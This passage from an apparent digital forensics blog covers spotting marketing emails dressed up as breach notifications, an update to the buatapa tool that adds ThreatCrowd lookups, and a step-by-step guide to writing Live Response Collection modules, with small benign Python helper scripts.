I do perform monitoring from several data sources for my clients, and in the event of discovering data from another company, I will tell them who I am, who I work for, exactly what I was doing, how I found their data, where they can go to find that data, and how to contact me, and leave it at that. I strive to be as transparent as possible, because the last thing that I want to have happen is for a company to think that I was the source of their data being compromised. If they want to have additional conversations, that is entirely up to them, and I tell them so. I want to help people protect their networks and sensitive data, regardless of whether or not they hire me to help them. If you receive an email like this, the author of the email (who will usually NOT be a CEO or a member of the sales team; it will likely be a technical employee or a manager) should answer several questions in the original message, without you or your CIRT having to search for the answers:

- Who exactly are you?

- What company do you currently work for?

- What were you doing when you found this information?

- Where did you find this information?

- When did you find this information?

- What is your contact information? (Not in a signature block; you should clearly list your contact information.)

If these questions are not answered with very specific details, it is more than likely going to be just another marketing email, trying to get you to spend your money to utilize their services. Granted, this may not always be the case, but usually, it will be. When in doubt, you can always get a second opinion, which is exactly what Kelvarnsen Industries did when they contacted me regarding this issue.

This case also highlights another area of importance that I cannot stress enough. It is bad enough that CIRT/Net Defenders/etc. teams are tasked on a daily basis with detecting and thwarting attacks by adversaries. When a company's C-Suite executives receive an email like this, the teams must stop everything that they are doing in order to manage their C-Suite executives' concerns and ultimately determine whether an email such as this is an actual phish or is nothing more than a vaguely worded and misconstrued marketing attempt (ahem...scare tactics). This also shows that unknowledgeable individuals are targeting companies, in publicly available data sources, in an effort to find out more about them in an attempt to secure a business deal. Pretty ironic that these folks are doing the EXACT same thing that adversary groups are doing: attempting to gather information for their own financial or informational gain. The irony of that is not lost on anyone! The unfortunate truth about marketing emails like this is that, just like phishing, they must work occasionally or else these unknowledgeable individuals would not send them. These teams also have enough to do on a daily basis (plus after-hours and weekends, as was the case here) without having to deal with the Marketing Persistent Threat. Blatant marketing attempts such as the one detailed in this post hurt MUCH more than they could ever possibly help!

Labels: "BriMor Labs", "cyber security", "data breach notification", "data breach", "digital forensics", "incident response", "snake oil", cyber, DFIR, email, malware, marketing, notification, phishing, spam, virustotal

Thursday, November 12, 2015

Updates (and a new feature!) to buatapa

Hello again readers and welcome back! Today we are pleased to announce the release of a new version of buatapa, updating from version 0.0.5 to 0.0.6. The changes are going to be mostly transparent for end users, but it does account for a change in the output of autoruns.csv files generated with the recently released Autoruns 13.5, which has an additional field in the output. The new version of buatapa attempts to identify whether the autoruns.csv file was generated by Autoruns 13.5 or by Autoruns 13.4 (or earlier). The parsing of the data and the need for the VirusTotal API key to do the VirusTotal lookups are exactly the same.
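One simple way to tell the two formats apart is to count the fields in the header row. The Python sketch below shows the idea only; it is not the actual buatapa code, the column names are invented, and the field count of the older format is passed in as a parameter rather than hard-coded, since I am not stating the real numbers here.

```python
import csv
import io


def header_field_count(csv_text: str) -> int:
    """Return the number of fields in the first row of CSV text."""
    reader = csv.reader(io.StringIO(csv_text))
    header = next(reader, [])
    return len(header)


def looks_like_newer_format(csv_text: str, older_field_count: int) -> bool:
    """True if the header has more fields than the older format is known to have."""
    return header_field_count(csv_text) > older_field_count


if __name__ == "__main__":
    # Hypothetical headers, only to show the comparison.
    older = "Time,Entry Location,Entry\n"
    newer = "Time,Entry Location,Entry,Extra Field\n"
    print(looks_like_newer_format(older, older_field_count=3))
    print(looks_like_newer_format(newer, older_field_count=3))
```

Using the `csv` module instead of splitting on commas keeps quoted fields that contain commas from throwing off the count.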

And as a super awesome bonus feature, it also performs queries of ThreatCrowd and returns data if it is found. In order to not have to write an additional timer (the ThreatCrowd API is limited to one query every 10 seconds), I included the ThreatCrowd lookup with the VirusTotal lookup, so for the purposes of buatapa you are required to have the VirusTotal API key in order to perform the ThreatCrowd lookups. You can modify the script to not require that if you wish, but if you do that, be sure to allow for a 10-second sleep between each query.
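If you do decide to separate the two lookups, the 10-second spacing can be handled by a small helper like the Python sketch below. This is an illustration rather than anything shipped in buatapa; the class name `MinIntervalLimiter` is made up, and the clock and sleep functions are passed in only so the behavior can be checked without actually waiting.

```python
import time


class MinIntervalLimiter:
    """Make sure consecutive calls to wait() are at least `min_interval` seconds apart."""

    def __init__(self, min_interval=10.0, clock=time.monotonic, sleep=time.sleep):
        self.min_interval = min_interval
        self._clock = clock
        self._sleep = sleep
        self._last = None  # time of the previous query, None before the first one

    def wait(self):
        """Block until it is safe to send the next query, then record the time."""
        now = self._clock()
        if self._last is not None:
            remaining = self.min_interval - (now - self._last)
            if remaining > 0:
                self._sleep(remaining)
                now = self._clock()
        self._last = now


if __name__ == "__main__":
    limiter = MinIntervalLimiter(min_interval=10.0)
    for file_hash in ["hash-one", "hash-two"]:  # placeholder values
        limiter.wait()
        print("would query ThreatCrowd for", file_hash)
```

Calling `wait()` right before each query means the first lookup goes out immediately and only the later ones are delayed.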

| Output results of buatapa 0.0.6 |

In this particular instance, we have two URLs. One is for the VirusTotal results of the hash:

| VirusTotal results for the ZeroAccess malware sample |

and the other is for the ThreatCrowd results of the hash:

| ThreatCrowd results for the ZeroAccess malware sample |

If it has been noted on ThreatCrowd you can go through the information listed to look for additional information on the malware, including domains and IP addresses, in an effort to help combat/detect other instances of the malware within your environment. Plus, the pictures are really nice!!

buatapa_0_0_7.zip - download here

MD5: 8c2f9dc33094b3c5635bd0d61dbeb979

SHA-256: c1f67387484d7187a8c40171d0c819d4c520cb8c4f7173fc1bba304400846162

Version 0.0.7

Updated: January 30, 2018

Labels: "BriMor Labs", "buatapa", "cyber security", "data breach", "digital forensics", "incident response", "Live Response Collection", autoruns, cyber, DFIR, malware, noriben, Python, script, ThreatCrowd, virustotal

Friday, October 30, 2015

Putting a wrap on October

Hello again readers and welcome back! For us, October consisted of a lot of traveling and giving presentations about the Live Response Collection at BSides Raleigh, Anne Arundel Community College, WomenEtc. (Richmond, Virginia), and the Open Source Digital Forensics Conference (OSDFCon). I just posted the presentation that I gave at OSDFCon on SlideShare, if you would like to view the slides!

NOTE: I made some slight variations on the presentation at each venue, so if you attended one (or more!) of my talks you will notice that the slides are similar, but may not be exactly what you saw.

All of the events that I spoke at were great, but I was most impressed with OSDFCon this year. There was an incredible lineup of speakers at the event, and the venue and presentation were fantastic (and thanks again go out to Ali for all of her hard work, mainly behind the scenes, to ensure the event went smoothly!). There were quite a few students and other new entrants into the DFIR community at this year's event, which is always great to see. Hopefully that trend continues, as there is not a single person within the DFIR community who has gotten to where they are today without the help, collaboration, and communication of others!

Not to give away any spoilers, but I am working on some exciting updates for the Live Response Collection, primarily on the OSX side, that I hope to have out before the end of the year. I am always looking for anyone who can devote any time or resources for beta testing, so if you want to help please do not hesitate to reach out!

Monday, September 21, 2015

Introducing Windows Live Response Collection modules...and how to write your own!

Hello again readers and welcome back. Today I am very happy to announce the public release of the latest round of updates to the Live Response Collection. This release focuses on the "modules" that I touched briefly on in the last update. The size of the six main scripts themselves has been greatly reduced and almost all of the code now resides in the folder "Scripts\Windows-Modules". This makes maintaining the code easier (since all six scripts share a large majority of the code, it only has to be edited once instead of six times) and allows even greater customization opportunities for end users.

There are some small changes to the way the LRC handles data, including a built-in check to ensure the date stamp does not have weird characters, which was seen on some UK-based systems. The script now attempts to decipher that data properly but, in the event that it cannot, it tries to ensure that backslashes are removed from the date field so that the output of the tools and system calls is stored properly.
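The underlying problem is that a date stamp ends up in file and folder names, so any character that Windows does not allow in a name will break the output path. The LRC does this in batch; the Python sketch below only illustrates the same idea, with a hypothetical function name and example dates, and it strips the other characters Windows reserves in file names as well as the backslash.

```python
# Characters that Windows does not allow in file or folder names.
INVALID_NAME_CHARS = '\\/:*?"<>|'


def safe_date_stamp(raw: str) -> str:
    """Return `raw` with surrounding whitespace and invalid name characters removed."""
    return "".join(ch for ch in raw.strip() if ch not in INVALID_NAME_CHARS)


if __name__ == "__main__":
    print(safe_date_stamp("21/09/2015"))
    print(safe_date_stamp("2015\\09\\21"))
```

Whatever is left after the cleanup is safe to use as part of a folder name, even if the date itself could not be fully deciphered.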

Writing your own module!!

The main focus of this update is demonstrating how easy it is to create your own module. I attempted to make this process as easy as possible, so if you want to write/add modules, you can do so very easily. Since it is written in batch, you can write your own module however you would like, but following this methodology should present the best results and ensure that the script will error out rather than possibly present bad data to you.

The first thing you have to do is choose an executable (or system call) that you would like to add. In this particular case, I decided that the "Wireless NetView" executable from NirSoft would be a good choice for the walkthrough. Next, download the zip file from their website, then navigate to the download folder and unzip the file. You should see a folder like this.

| Contents of the folder "wirelessnetview" |

Copy that folder to the "Tools" directory under the Windows Live Response folder.

| wirelessnetview folder under "Tools" |

Once that is done, you are ready to begin writing your module!

Initial Steps of Module Creation

| Contents of Windows-Module-Template.bat |

Once you have it open, save it as the tool name that you would like to run. In this case, I would open the file "Windows-Module-Template.bat" and save it as "wirelessnetview.bat".

| Saving the template as our new module |

Now you can begin to edit the "wirelessnetview.bat" module and add more functionality to the LRC!

Writing the module

To write the module, you need to:

1) Have an understanding of what command line arguments you need to give your executable file (or system command), and

2) Be able to find and replace text within your new batch script

You should not have to change any of the environment and script variables, so I will not cover them in great detail, unless a specific request is made to do so. Here is a full listing of the items that you should replace (Ctrl + H in most cases):

YYYYMMDD - Four digit year, two digit month, and two digit day (19970829, 20150915)

DD - Date you wrote the module, with two digits (03, 11, 24, 31)

Month - Month you wrote the module (July, March, December)

YYYY - Year you wrote the module (2015, 2016, 4545)

[Your Name] - Your name, if you want to put it in there (Brian Moran, Leeroy Jenkins)

[you@emailaddress] - Your email address, if you want to put it in there (tony@starkindustries.com, info@mrrobot.com)

[Twitter name] - Your Twitter name, if you want to put it in there (Captain America, Star Wars)

[@Twitterhandle] - Your Twitter handle, if you want to put it in there (@captainamerica, @starwars)

[MODULENAME] - What you want to call your module. I prefer to use the tool name, so in this case WIRELESSNETVIEW

[Tool path] - This is the path, within the tools folder, of the folder name and the exe. In this case, it would be wirelessnetview\WirelessNetView.exe

[command line arguments] - This is where you have to do some testing of running your tool from the command line before you create the module. In this particular case, I am going to use what is listed on the web page as the command I want to run. The full command is

WirelessNetView.exe /shtml "f:\temp\wireless.html", so our [command line arguments] in this case would be /shtml

[Output folder] - The folder that you want to output the data to. Since this is network related, saving it under "NetworkInfo" seems like a good idea.

[Output file name and file extension] - The filename that you want to save the file as. Generally I make this the name of the tool, so I would call this one "Wirelessnetview.html".

[Tool name] - The name of the tool. (Wirelessnetview)

[Executable name] - The name of the executable (WirelessNetView.exe)

[Executable download location, if applicable] - The URL where you downloaded the tool from (in this case, http://www.nirsoft.net/utils/wireless_network_view.html)

And that is it!

**Please note that you can choose between saving the output directly, or having the executable/command itself save the output. It is best to refer to the executable or system command when trying to determine "how" you should save the output.**

So when we modify the wirelessnetview.bat file, we replace the following items with their value:

YYYYMMDD - is replaced with 20150917

DD - is replaced with 17

Month - is replaced with September

YYYY - is replaced with 2015

[Your Name] - is replaced with Brian Moran

[you@emailaddress] - is replaced with brian@brimorlabs.com

[Twitter name] - is replaced with BriMor Labs

[@Twitterhandle] - is replaced with @BriMorLabs

[MODULENAME] - is replaced with WIRELESSNETVIEW

[Tool path] - is replaced with wirelessnetview\WirelessNetView.exe

[command line arguments] - is replaced with /shtml

[Output folder] - is replaced with NetworkInfo

[Output file name and file extension] - is replaced with Wirelessnetview.html

[Tool name] - is replaced with Wirelessnetview

[Executable name] - is replaced with WirelessNetView.exe

[Executable download location, if applicable] - is replaced with http://www.nirsoft.net/utils/wireless_network_view.html

| Screenshot of our new module, after replacing the text! |
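If you would rather script the find and replace than do it by hand with Ctrl + H, the same substitutions can be sketched in a few lines of Python. Please treat this as an illustration only: the function name is hypothetical and the template text below is made up, it is not the real contents of Windows-Module-Template.bat. The one detail that matters is the order, since replacing "YYYY" or "DD" first would damage "YYYYMMDD".

```python
def fill_template(template, values):
    """Replace every placeholder key in `template` with its value."""
    # Longest placeholders go first so that "YYYY" and "DD" cannot
    # partially overwrite "YYYYMMDD" before it has been replaced.
    for placeholder in sorted(values, key=len, reverse=True):
        template = template.replace(placeholder, values[placeholder])
    return template


# Hypothetical template lines, not the real Windows-Module-Template.bat
template = (
    "REM [MODULENAME] module written DD Month YYYY (YYYYMMDD) by [Your Name]\n"
    "REM Runs [Executable name] with [command line arguments]\n"
    "REM Output: [Output folder]\\[Output file name and file extension]\n"
)

values = {
    "YYYYMMDD": "20150917",
    "DD": "17",
    "Month": "September",
    "YYYY": "2015",
    "[Your Name]": "Brian Moran",
    "[MODULENAME]": "WIRELESSNETVIEW",
    "[command line arguments]": "/shtml",
    "[Output folder]": "NetworkInfo",
    "[Output file name and file extension]": "Wirelessnetview.html",
    "[Executable name]": "WirelessNetView.exe",
}

if __name__ == "__main__":
    print(fill_template(template, values))
```

A bare placeholder like "DD" can also match inside unrelated text, so it is still worth reading through the finished module before you run it.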

Now that our module is written, we have to add the module to whichever batch scripts we would like. I usually like to keep the modules that perform similar functions near each other, so in this case I am going to choose to add it after the PRCVIEWMODULE. The easiest way to do this is simply copy the five lines of text associated with the PRCVIEWMODULE entry, and paste it below it.

| Selecting the code associated with PRCVIEWMODULE |

| Copying the code associated with PRCVIEWMODULE to create a new subroutine for our new module |

Once you have it copied, change the line GOTO ....MODULE in the original module to the name of your new module. In this case, we would change it to GOTO WIRELESSNETVIEWMODULE. Then change the name of the subroutine itself to the name of your module, in this case WIRELESSNETVIEWMODULE.

| Adding WIRELESSNETVIEWMODULE code |

Finally, change the name of the batch script that is being called to the name of your newly created script, then save it. That is it, you are all done!

| Our module is fully added! |

It is best to run your module(s) on a test system before deploying them widely, just to ensure that everything works properly. Also ensure that you add the code for your new module to each of the six batch scripts, if you so desire.

I hope that this tutorial has been helpful. Please do not hesitate to contact me if you have any additional questions or comments as you create your own modules for the Live Response Collection!

LiveResponseCollection-Cedarpelta.zip - download here

MD5: 7bc32091c1e7d773162fbdc9455f6432

SHA256: 2c32984adf2b5b584761f61bd58b61dfc0c62b27b117be40617fa260596d9c63

Updated: September 5, 2019
